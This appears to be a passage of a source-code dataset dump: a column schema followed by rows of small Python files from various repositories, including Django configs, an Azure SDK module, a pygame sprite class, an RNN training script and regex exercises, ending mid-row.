blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
sequencelengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40a5badf20a8815924f3d9ea4e245dba81149a88 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03588/s910432178.py | 314d7a583d1067ee67cd31e93342774353c07a3a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | import sys
def solve():
readline = sys.stdin.buffer.readline
mod = 10 ** 9 + 7
n = int(readline())
ab = [list(map(int, readline().split())) for _ in range(n)]
ab.sort()
print((ab[-1][0] - ab[0][0] + 1) + (ab[0][0] - 1) + (ab[-1][1]))
if __name__ == '__main__':
solve()
| [
"[email protected]"
] | |
937d9d68a3ca6a4f6ea6bae2b249aa41d8a5a349 | a94758b88353889c8186b32e7b5acbe7f77807e9 | /iGottaDjango/urls.py | 536178fc1455f03899b5d2b6817766bfc6c3b6ac | [] | no_license | Stephanie-Spears/iGottaDjango | fcc9bf9ec2ee9ceb5a71e88c0a285a4f032f0523 | 69326b2aac9926cf33810e46528370ebdfeacb05 | refs/heads/master | 2021-08-15T01:51:13.498214 | 2017-11-17T06:09:33 | 2017-11-17T06:09:33 | 109,955,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 815 | py | """iGotta URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^polls/', include('polls.urls')),
url(r'^admin/', admin.site.urls),
] | [
"[email protected]"
] | |
bd5cb730104181ac2296d2a313eb30e514464624 | 6ae9ecca3049ea0df016db4d78eb93ae0edfedd3 | /python/day6/if_elif_0.py | 304427bc0cdf9efd6a90511fb4acbec7b0a517bd | [] | no_license | itcsoft/itcpython | 41dc79534f4727a74ec24c651b06d7fba5c9d23b | 208ad1e92ec8ea687878097696dff9b81e0dffb8 | refs/heads/main | 2023-06-15T08:38:30.316981 | 2021-07-08T13:19:19 | 2021-07-08T13:19:19 | 368,862,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py |
san = int(input('Сан бериниз мен ошол санды текст менен чыгарам: '))
if san == 0:
print('Ноль')
elif san == 1:
print('Бир')
elif san == 2:
print('Эки')
elif san == 3:
print('Уч')
elif san == 4:
print('Торт')
elif san == 5:
print('Беш')
elif san == 6:
print('Алты')
| [
"[email protected]"
] | |
702e397972e162ab5ddf2af196684a76f393bd61 | 71673d845952b50986d1c21dc5bbbcab2a2a2651 | /introduction_to_lxml.py | 0783fcf78d6a6982eff93f7b0558518976c20d60 | [] | no_license | afcarl/introductionToWebScraping | 77a44bfb7655e44231bed216d37b015e3cf52a5c | d1039aeee87365f2807dd198e53bd1bb6224a550 | refs/heads/master | 2020-03-26T04:23:54.052825 | 2015-06-18T14:23:40 | 2015-06-18T14:23:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 507 | py | import requests
import lxml.html
base_url = "https://www.google.com"
def scrape(url,base_url,depth):
if depth == 0:
return True
r = requests.get(url)
html = lxml.html.fromstring(r.text)
links = html.xpath("//a/@href")
for ind,link in enumerate(links):
if "http" in link:
print link
else:
print base_url+link
links[ind] = base_url+link
for link in links:
scrape(link,base_url,depth-1)
scrape(base_url,base_url,5)
| [
"[email protected]"
] | |
8c9ed2c590e238e301a9e40e0b825621f0adc9fd | dad76c42edf331fe3c04d148401dce1736cc2601 | /to_do_list/tasks/helper_functions.py | bf10576b218ffbd09a9581375c8ae5b1fcddd496 | [
"MIT"
] | permissive | arnaudblois/to_do_list | 2bb5c8ffd606be612808ba3ab31d1a19e7779b89 | 07a9e443110d14271a59bd8ff1a2f55ac753ea9d | refs/heads/master | 2020-02-29T17:21:46.669980 | 2017-02-17T08:30:52 | 2017-02-17T08:30:52 | 82,172,054 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | # -*- coding: utf-8 -*-
"""
Helper functions for the tasks app: calculate_reputation_gain and
give_reputation_reward.
"""
from .models import Profile, Task
from django.db.models import F
def calculate_reputation_gain(task):
"""
Calculate the reputation gained by completing a task. Currently based on
difficulty only.
"""
DIFF = Task.DIFFICULTIES
d = task.difficulty
if d == DIFF.trivial:
return 1
if d == DIFF.easy:
return 5
if d == DIFF.OK:
return 10
if d == DIFF.hard:
return 25
if d == DIFF.heroic:
return 100
if d == DIFF.nightmare:
return 500
def give_reputation_reward(task):
"""
Add the reputation reward to the profile of the user who completed the
task.
"""
reward = calculate_reputation_gain(task)
profile = Profile.objects.get(user=task.completed_by)
profile.reputation = F('reputation') + reward
profile.save()
| [
"[email protected]"
] | |
89f125544944e622de6e320e5c6208ec3c790b7f | 938db19c64a54105ebdba84948a3c3a02a14b673 | /models.py | 9e843ff314bc768a8c7e920a8329d439ec2eb6de | [] | no_license | ProductionsAutrementDit/PortalSynonymPlugin | 894666ecfb61b99c9d28f4eb79d32d88407d4892 | 2663776169f26021b0415c8286fd7e59dbe0dba4 | refs/heads/master | 2021-01-10T22:38:16.514709 | 2017-04-26T10:00:51 | 2017-04-26T10:00:51 | 69,572,205 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | from django.db import models
class Synonym(models.Model):
value = models.CharField(max_length=255)
parent = models.ForeignKey("self", related_name="synonyms", max_length=100, on_delete=models.CASCADE, blank=True, null=True)
class Meta:
ordering = ['value']
class TagField(models.Model):
fieldname = models.CharField(max_length=255)
| [
"[email protected]"
] | |
611ca1b0710e080956b3f0259d5042c17ada5814 | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/aio/operations/_usages_operations.py | aa1860efef37dbf2413c285639f2957501b5bfdb | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 5,150 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._usages_operations import build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class UsagesOperations:
"""UsagesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.signalr.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
location: str,
**kwargs: Any
) -> AsyncIterable["_models.SignalRUsageList"]:
"""List resource usage quotas by location.
:param location: the location like "eastus".
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SignalRUsageList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.signalr.models.SignalRUsageList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SignalRUsageList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
location=location,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("SignalRUsageList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.SignalRService/locations/{location}/usages'} # type: ignore
| [
"[email protected]"
] | |
12b99157ef91baeba1b980e70567b5588589fb0c | a616d3f1491eae4a702d18ab30e2b3cfd43e1563 | /scrollbar.py | a43c58dca1721d5742a1355ef8ec4ffaf02cb63d | [] | no_license | supriadi-yusuf/python-GUI | 9d15c27fcaabb55aa61ccabef2afcc3f9a26370f | 557ab9720442d7d810567441119c3efa4b1b7b34 | refs/heads/master | 2020-06-29T16:47:58.236428 | 2019-08-07T01:09:09 | 2019-08-07T01:09:09 | 200,570,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | from tkinter import (
Tk, RIGHT, Y, Scrollbar, Listbox, END, BOTH, LEFT
)
layar=Tk()
layar.title("Scrollbar")
myScrollbar = Scrollbar(master=layar)
#myScrollbar.pack(side=RIGHT, fill=Y)
#myScrollbar.pack(side=LEFT, fill=Y)
myList = Listbox(master=layar,
#height=5,
yscrollcommand=myScrollbar.set)
for line in range(100):
myList.insert(END, "This is line number " + str(line))
#myList.pack(side=LEFT,fill=BOTH)
myList.pack(side=LEFT,fill=Y)
myScrollbar.pack(side=LEFT, fill=Y)
myScrollbar.config(command=myList.yview)
layar.mainloop()
| [
"[email protected]"
] | |
3eecda5d5aed0185231c064ba9d3916edaf9df22 | eac6bd2191daab17189eb9f221048cda3179c216 | /scripts/example_numbercounting.py | d95a2ab0cd72ae35b68503c252a47fe348106a6a | [] | no_license | ghl3/histfactoryUnitTests | 83fb0e21b8b640f40170a254a7686308c5d03495 | 0bf9da7335707a7f9da658fb16005b3dc9da4583 | refs/heads/master | 2021-01-23T05:45:19.665227 | 2012-11-16T20:01:32 | 2012-11-16T20:01:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,171 | py | #!/usr/bin/env python
#
# A pyROOT script demonstrating
# an example of writing a HistFactory
# model using python
#
# This example was written to match
# the example.xml analysis in
# $ROOTSYS/tutorials/histfactory/
#
# Written by George Lewis
#
#
# There are several way to use HistFactory to
# create a model.
#
# In this example, the model is configured and built
# entirely within this script. It requires no external
# configuration files or any saved histograms.
#
def main():
try:
import ROOT
except:
print "It seems that pyROOT isn't properly configured"
return
"""
Create a HistFactory measurement from python
"""
# Create and name a measurement
meas = ROOT.RooStats.HistFactory.Measurement("meas", "meas")
#meas.SetOutputFilePrefix( "./results/example_UsingPy_SetVal" )
# Set the Parameter of interest, and set several
# other parameters to be constant
meas.SetPOI( "SigXsecOverSM" )
meas.AddConstantParam("Lumi")
meas.AddConstantParam("alpha_syst1")
meas.AddConstantParam("alpha_syst2")
meas.AddConstantParam("alpha_syst3")
# Set the Lumi (1.0 = nominal in this example, 10% error)
meas.SetLumi( 1.0 )
meas.SetLumiRelErr( 0.10 )
# Here, this determines if the model is fit
# within the "MakeModelFast" function or not
meas.SetExportOnly( False )
# InputFile = "./data/NumberCounting.root"
# Create a channel and set
# the measured value of data
# (no extenal hist necessar for cut-and-count)
chan = ROOT.RooStats.HistFactory.Channel( "channel1" )
chan.SetData( 20 )
chan.SetStatErrorConfig( 0.05, "Poisson" )
# Create the signal sample and
# set it's value
signal = ROOT.RooStats.HistFactory.Sample( "signal" )
signal.SetValue( 5 )
# Add the parmaeter of interest and a systematic
signal.AddNormFactor( "SigXsecOverSM", 1, 0, 3 )
signal.AddOverallSys( "syst1", 0.95, 1.05 )
chan.AddSample( signal )
# Create a background sample
background1 = ROOT.RooStats.HistFactory.Sample( "background1" )
background1.SetValue( 10 )
background1.SetNormalizeByTheory( True )
# Add a systematic
background1.AddOverallSys( "syst2", 0.95, 1.05 )
chan.AddSample( background1 )
# Create another background sample
background2 = ROOT.RooStats.HistFactory.Sample( "background2" )
background2.SetValue( 4 )
background2.SetNormalizeByTheory( True )
# Add a systematic
background2.AddOverallSys( "syst3", 0.95, 1.05 )
chan.AddSample( background2 )
# Add this channel to the measurement
meas.AddChannel( chan )
# Print some info for debugging
meas.PrintTree()
# Now, do the measurement
myFactory = ROOT.RootStats.HistFactory()
myWorkspace = myFactory.MakeCombinedModel( measurement )
combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelAndMeasurementFast( meas )
#combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelFast( meas )
#combinedWorkspace = ROOT.RooStats.HistFactory.MakeModelFast( meas )
# combinedWorkspace.Print("V")
pass
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
8728234043cd78faea94c87589dea2b093ce9e0e | 54483c7314149f73d559476a16c8f046fd21d987 | /demo/migrations/0005_auto_20210720_1008.py | 4ae48e3c085d0b72cbd7e941bbb13f085cd15aef | [] | no_license | phuongthao2145/testpython | 27d514a895cddc74afaf768acff81f5e82591975 | ab999b9771e90c0709998030051bcc4bce4873be | refs/heads/master | 2023-06-27T06:55:46.711635 | 2021-07-26T11:27:39 | 2021-07-26T11:27:39 | 386,623,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 643 | py | # Generated by Django 3.1.4 on 2021-07-20 10:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('demo', '0004_testresult_tag'),
]
operations = [
migrations.RenameField(
model_name='demo',
old_name='f0',
new_name='f_status',
),
migrations.RemoveField(
model_name='demo',
name='f1',
),
migrations.RemoveField(
model_name='demo',
name='f2',
),
migrations.RemoveField(
model_name='demo',
name='f3',
),
]
| [
"[email protected]"
] | |
875ef43560a7117ab76732fbd81c3a1778a3e8b5 | 6694cdf9827bc72262f6e5f37a419c292433dd61 | /scripts/misc/config_abl_3dassembly_optimal_bc_loss.py | 7f3c29e7322dfa637d0c4616bdfb86ac29df9610 | [
"MIT"
] | permissive | shagunuppal/mopa-pd | ce07df4eb4390e0e24d8f2f1deafe83577fa44fc | ac55f568149d8e79c28326bcd9b63336ed065a61 | refs/heads/master | 2023-08-30T17:37:43.842057 | 2021-11-04T14:48:34 | 2021-11-04T14:48:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 936 | py | # for this figure, we need to multiple all y values by 1e6 (y_data = y_data * 1e6) and set
# y-tick labels directly plt.yticks([1.3, 1.4, 1.6, 2.0], fontsize=12).
filename_prefix = 'SawyerAssembly-Abl-Optimal-BC-Loss'
xlabel = 'Epoch'
ylabel = 'Mean Square Error (x 1e-6)'
max_step = 40
min_y_axis_value = 1e-6
max_y_axis_value = 2e-6
legend = True
data_key = ["Action Prediction Loss (Train)", "Action Prediction Loss (Test)"]
bc_y_value = 0
smoothing = False
smoothing_weight = 0
legend_loc = 'upper right'
wandb_api_path = 'arthur801031/mopa-rl-bc-visual'
num_points = 40
x_scale = 1
divide_max_step_by_1mill = False
build_log_from_multiple_keys = True
limit_y_max = True
limit_y_max_value = 2e-6
plot_labels = {
'Train': ['BC Visual Stochastic_3DAssembly_curious-spaceship-136'],
'Test': ['BC Visual Stochastic_3DAssembly_curious-spaceship-136'],
}
line_labels = {}
line_colors = {
'Train': 'C0',
'Test': 'C1',
} | [
"[email protected]"
] | |
df4017d719a457eb43a5aa6c9d289e9e674a9b84 | e61802befd592a18d535999277e3d4767042a441 | /problem_11.py | 8c4304f4ad7e6f7973982931f25f9f46d2d2458a | [] | no_license | subenakhatun/pythonbasic | 5962804d4aaee18c9bc5e8f1d178ae846efabd85 | 36066df0a9355c6d451e80e06fba2fb712759f3d | refs/heads/master | 2021-07-20T23:21:49.113162 | 2020-05-15T04:11:19 | 2020-05-15T04:11:19 | 163,249,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | str = 'subena'
print(len(str)) | [
"[email protected]"
] | |
4de4a3deb1892d8a98427efd454a04849d8f4eda | f2fcf807b441aabca1ad220b66770bb6a018b4ae | /coderbyte/letter_capitalize.py | 0db39e3300d9e2d0d879d72ba1ae2420481d6fcb | [] | no_license | gokou00/python_programming_challenges | 22d1c53ccccf1f438754edad07b1d7ed77574c2c | 0214d60074a3b57ff2c6c71a780ce5f9a480e78c | refs/heads/master | 2020-05-17T15:41:07.759580 | 2019-04-27T16:36:56 | 2019-04-27T16:36:56 | 183,797,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | def LetterCapitalize(str):
# code goes here
return str.title()
print(LetterCapitalize("h3llo yo people")) | [
"[email protected]"
] | |
9573e2d03f021cd4eee80553f9755cffcb49464b | 67d1deb7b3f5d6d03028e938dcba06c44392fe87 | /code/util/datastorage/SPEngine.py | 6a7a12a546407b6594073c15569ddfc6d1e5ddb7 | [] | no_license | GGXH/DS_stock | 389881403b0356072f2f5a7b64bd9098f87f9784 | c516dd4a546cb48d98198239ed33260acfb2adb8 | refs/heads/master | 2020-04-05T19:31:43.306362 | 2019-01-16T15:37:44 | 2019-01-16T15:37:44 | 157,138,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | import util.status.messager as msg
class SPEngine:
def __init__(self):
| [
"[email protected]"
] | |
36e139de605165c83a26635746a0cfb6c93b6fe8 | 0b0ac289ed7fbb8e0012ca97ec6dc2f925be058f | /spray.py | edf293ad0f59e8809a8da962eadce4d5fdf18574 | [] | no_license | KRHS-GameProgramming-2014/butterfly-game1 | 8b57dbb060a6aa6fd6539bed877551ba45e2a017 | cf4c15b801354fff739bfb66e6f94ebaecb60dd4 | refs/heads/master | 2021-01-19T14:07:38.894097 | 2015-03-23T13:05:33 | 2015-03-23T13:05:33 | 32,520,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | import math,sys,pygame
class Spray():
def __init__(self,player):
self.facing = player.facing
if self.facing == "up":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [0, -5]
elif self.facing == "down":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [0, 5]
elif self.facing == "right":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [5, 0]
elif self.facing == "left":
self.image = pygame.image.load("rsc/Projectiles/spray.png")
self.speed = [-5, 0]
self.rect = self.image.get_rect()
self.damage = 250
self.place(player.rect.center)
self.radius = 500
self.move()
self.living = True
def move(self):
self.rect = self.rect.move(self.speed)
def collideWall(self, width, height):
if self.rect.left < 0 or self.rect.right > width:
self.speedx = 0
#print "hit xWall"
if self.rect.top < 0 or self.rect.bottom > height:
self.speedy = 0
def collideSpray(self, other):
if self != other:
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if (self.radius + other.radius) > self.distance(other.rect.center):
self.living = False
def collideGust(self, other):
if self != other:
if self.rect.right > other.rect.left and self.rect.left < other.rect.right:
if self.rect.bottom > other.rect.top and self.rect.top < other.rect.bottom:
if (self.radius + other.radius) > self.distance(other.rect.center):
self.living = False
def place(self, pt):
self.rect.center = pt
def update(self, width, height):
#self.speed = [self.speedx, self.speedy]
self.move()
self.collideWall(width, height)
def distance(self, pt):
x1 = self.rect.center[0]
y1 = self.rect.center[1]
x2 = pt[0]
y2 = pt[1]
return math.sqrt(((x2-x1)**2) + ((y2-y1)**2))
def animate(self):
if self.waitCount < self.maxWait:
self.waitCount += 1
else:
self.waitCount = 0
self.facingChanged = True
if self.frame < self.maxFrame:
self.frame += 1
else:
self.frame = 0
if self.changed:
if self.facing == "up":
self.images = self.upImages
elif self.facing == "down":
self.images = self.downImages
elif self.facing == "right":
self.images = self.rightImages
elif self.facing == "left":
self.images = self.leftImages
self.image = self.images[self.frame]
| [
"[email protected]"
] | |
b107aba0725e0d5aa26ab156bc55db785eb5b9b1 | ecc736ba966a235a4d07e5af298f97a4437defc9 | /Assignment 4/p4.py | 6e13ea7adee23ed2f568e69e4c583f37dc5abb36 | [] | no_license | davifrossard/CSC321 | 6a832c245fdb683df57f47f5033e5b5de71ae2fa | e3f17bc5399800aee400261cb13b45d6c1437292 | refs/heads/master | 2020-04-14T05:49:10.742021 | 2016-04-20T14:33:21 | 2016-04-20T14:33:21 | 50,119,837 | 5 | 8 | null | null | null | null | UTF-8 | Python | false | false | 4,847 | py | from RNN import *
from utils import print_warning
from os import makedirs
from time import sleep
import datetime, time
# Create results directory
if not path.exists('results/'):
makedirs('results/')
# Data I/O
data = open('shakespeare_train.txt', 'r').read()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print 'Data has %d characters, %d unique.' % (data_size, vocab_size)
# Hyper-parameters
hidden_size = 250
seq_length = 25
learning_rate = 1e-1
temperature = 1
# Create model
RNN = RNN_Model(hidden_size, chars, temperature)
# Smooth Out loss
smooth_loss = -np.log(1.0/vocab_size)*seq_length
p = 0
n = RNN.get_iter()
print "Training RNN, hit Ctrl+C to stop."
try:
while True:
n += 1
# Create training set from file
inputs = data[p:p+seq_length]
targets = data[p+1:p+seq_length+1]
# Update RNN with data
loss = RNN.update_rnn(inputs, targets, learning_rate)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
# Increment data pointer with wrap-around
if p+2*seq_length+1 < len(data):
p += seq_length
else:
p = 0
RNN.reset_state()
print_warning("[I] Finished pass through file.")
# Show progress
if n % 250 == 0:
print "---------------------------------------------"
st = datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')
print "[%s] Iteration: \t\t%d" % (st, n)
print "\t\t Loss: \t\t\t%7.4f" % smooth_loss
print "\t\t Characters Fed: %d" % p
print "\t\t Sample: \n\n"
print RNN.sample_rnn(data[p], 200)
print "---------------------------------------------\n\n"
except KeyboardInterrupt:
print "Halting training"
#
# ------------------------
# PART 1
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 1\n"
"---------------------\n")
temperatures = [0.1, 0.5, 0.7, 1., 1.5]
for i in temperatures:
samples = []
for j in range(3):
samples.append(RNN.sample_rnn(data[np.random.randint(0, len(data))], 200, i))
samples = '\n-----------------------------------------\n\n'.join(s.rstrip() for s in samples)
print samples
with open('results/samples_%4f.txt' % i, 'w+') as fl:
fl.write(samples)
#
# ------------------------
# PART 2
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 2\n"
"---------------------\n")
samples = []
for i in range(10):
temp = np.random.choice(temperatures[-3::])
samples.append(RNN.complete_phrase("The answer to life the universe and everything is ", temp))
samples = '\n-----------------------------------------\n\n'.join(s.rstrip() for s in samples)
print samples
with open('results/completion.txt', 'w+') as fl:
fl.write(samples)
#
# ------------------------
# PART 3
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 3\n"
"---------------------\n")
RNN.reload_rnn('char-rnn-snapshot.npz')
best_weights = RNN.test_sequence(':', '\n')
init_ix = RNN.char_to_ix[':']
end_ix = RNN.char_to_ix['\n']
with open('results/part3_weights.txt', 'w+') as f:
f.write('Input to State Weights: [%s, %d]\n'
'\t%s\n\n'
'State to Output Weights: [%d, %s]\n'
'\t%s\n\n'
%(best_weights, init_ix,
', '.join((str(w) for w in RNN.Wxh[best_weights, init_ix])),
end_ix, best_weights,
', '.join((str(w) for w in RNN.Why[end_ix, best_weights]))))
#
# ------------------------
# PART 4
# ------------------------
print_info("\n\n---------------------\n"
"RUNNING PART 4\n"
"---------------------\n")
RNN.reload_rnn()
associations = []
for char in sorted(chars):
res = RNN.find_association(char, 1)
association = repr("%s [%2d] -> %s [%2d]" % (char, RNN.char_to_ix[char],
res, RNN.char_to_ix[res]))
print association
associations.append(association)
with open('results/part4_associations.txt', 'w+') as f:
f.write('%s' % '\n'.join(a for a in associations))
RNN.reload_rnn()
best_weights = RNN.test_sequence('S', ':')
init_ix = RNN.char_to_ix['S']
end_ix = RNN.char_to_ix[':']
with open('results/part4_weights.txt', 'w+') as f:
f.write('Input to State Weights: [%s, %d]\n'
'\t%s\n\n'
'State to Output Weights: [%d, %s]\n'
'\t%s\n\n'
%(best_weights, init_ix,
', '.join((str(w) for w in RNN.Wxh[best_weights, init_ix])),
end_ix, best_weights,
', '.join((str(w) for w in RNN.Why[end_ix, best_weights]))))
| [
"[email protected]"
] | |
cc7d6f4efb3081ed341d4a57cc74f148f229edf1 | 58afbd547a9bfc0449c2e88a80ec0606950f5473 | /AudioToText.py | 05ad2e2f0ac84d6e3aadca5cb1bbd4de0339e837 | [] | no_license | suvashsumon/SpeechRecognitionDemo | 1c37c0c59049f62bbb37f730c1a4eb87817d7323 | f7c0c95b7c05a52d81f0d172abd340402b7bdfb5 | refs/heads/master | 2022-12-03T19:18:55.872325 | 2020-08-19T15:53:20 | 2020-08-19T15:53:20 | 288,773,782 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | # Author : Suvash Kumar
# Website : www.suvashkumar.xyz
import speech_recognition as sr
recognizer = sr.Recognizer()
audio_file = "speech.wav"
with sr.AudioFile(audio_file) as source:
audio_data = recognizer.record(source)
print("Recognizing this speech ......")
text = recognizer.recognize_google(audio_data)
print("Content of this audio : ",text) | [
"[email protected]"
] | |
ccfcd1900ee74cbfd43d8cee00efaa8ddc77b01a | 2e85be12b106f8bcb159e267a2c97ad3a6ea0b9d | /lessons/lesson3/myre.py | cf4e0d0b377c59bd1a03a89f650c29080cd26680 | [] | no_license | tinghe0928/awesome-python3-webapp | bb24af1a9e2898180c1252d4a70c92f7eadddc3e | 3c840f605f360c93e22f2b41ef06886cab35a2ef | refs/heads/master | 2020-05-26T14:46:17.536977 | 2019-10-16T08:30:48 | 2019-10-16T08:30:48 | 178,860,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,388 | py | import re
# re.compile()
# re.match()
# re.search()
# re.match().group(0) # return to Match object or None, if the first one do not match, fail to match and return None
# re.match().groups() # return to Match object or None, when there is a match, then return the matched one
#re.split()
"""
\d: for a numner
\w: for a character
\s: for space
.: any one character
*: any character include no character
+: at lesat one character
{8}: 8 character
{3:9}: 3 to 9 character
[0-9a-zA-z\_]: match one number/a character/_
[0-9a-zA-z\_]: match at least one number/a character/_
^: mactch the first one
$: match the last one
"""
str_tz = "UTC+8:00"
t_delta = re.match(r'(^UTC)((\+|\-)(\d))(\:\d{2})',str_tz)
print(t_delta.group(0))
print(t_delta.group(2))
print(re.match(r'^\d{3}\-\d{3,8}$', '010-12345').group(0))
print(re.match(r'[\w\,]+', 'a,b, c d').group(0))
print(re.split(r'[\s\,]+', 'a,b, c d'))
print(re.split(r'[t\s]+', 'hththtttthhhh'))
print(re.match(r'^(\w+?)(0*)$', '102334gg0g5500').groups())
"""[email protected]"""
re_rule = re.compile(r'([\w\.]+)@([\w\.]+)com$')
print(re_rule.match('[email protected]').group(0))
print(re_rule.match('[email protected]').group(0))
print(re_rule.search(' [email protected]').group(0))
"""the different between re.match and re.search"""
print(re.search('www','sam.www.com').group(0))
print(re.match('www','sam.www.com').group(0))
| [
"[email protected]"
] | |
45158fd73f856d10753fdab1158bbd52cbc902c4 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /es_maml/policies.py | f901bf44a33836629722349dd7c0953bd0a94da7 | [
